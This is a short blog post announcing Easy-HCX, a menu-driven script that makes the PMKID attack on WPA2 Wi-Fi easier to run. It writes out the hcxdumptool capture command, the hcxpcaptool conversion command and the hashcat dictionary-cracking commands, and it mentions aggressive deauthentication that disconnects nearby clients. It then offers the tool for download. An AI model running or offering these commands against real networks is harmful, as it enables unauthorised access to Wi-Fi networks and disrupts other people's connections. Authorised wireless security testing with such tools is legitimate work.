1 min read
May 4, 2019

Easy-HCX: Making Wifi Attacks Easy

Last year a new attack on WPA2 was announced by the creators of hashcat - one that didn't require capturing the 4-way handshake, any client interaction or any kind of client even connected. With a vulnerable access point, you can try to associate with the access point, capture a PMKID packet and crack that.

This new attack uses hcxdumptool to capture and hcxtools to convert the capture file to a format hashcat can use. The process would look something like this:

hcxdumptool -i wlan1 -o capture.pcapng --enable_status=1

hcxpcaptool -z capture.16800 -o capture.hccapx capture.pcapng (converting a pcapng to hccapx and/or 16800 formats)

hashcat -m 2500 -a 0 capture.pcapng <wordlist> (for a WPA2 handshake)


hashcat -m 16800 -a 0 capture.pcapng <wordlist> (for a PMKID)

By default, hcxdumptool only scans 2.4Ghz networks so if you want to it to scan both 2.4Ghz and 5Ghz networks, you'd have to type something like:

hcxdumptool -i wlan1 -o capture.pcapng --enable_status=1 -c 1,2,3,4,5,6,7,8,9,10,11,12,13,14,36,38,<crapton of channels>,161

That got old really quick so I wrote a script to simplify things and make it more user-friendly. The goal was not to automate everything, just to make basic functions easier to use without having to remember or type out long commands. A menu driven interface was easiest for me to work with so that's what I did.

At the moment Easy-HCX only has hashcat doing dictionary attacks. I may try to incorporate other attacks in the future.

Instead of explaining everything with a wall of text, I made a demo video instead. Check it out:

Be very careful if you choose to enable deauthentications - hcxdumptool is quite aggressive with this and will boot off pretty much everything nearby if you aren't doing a targeted attack.

Download here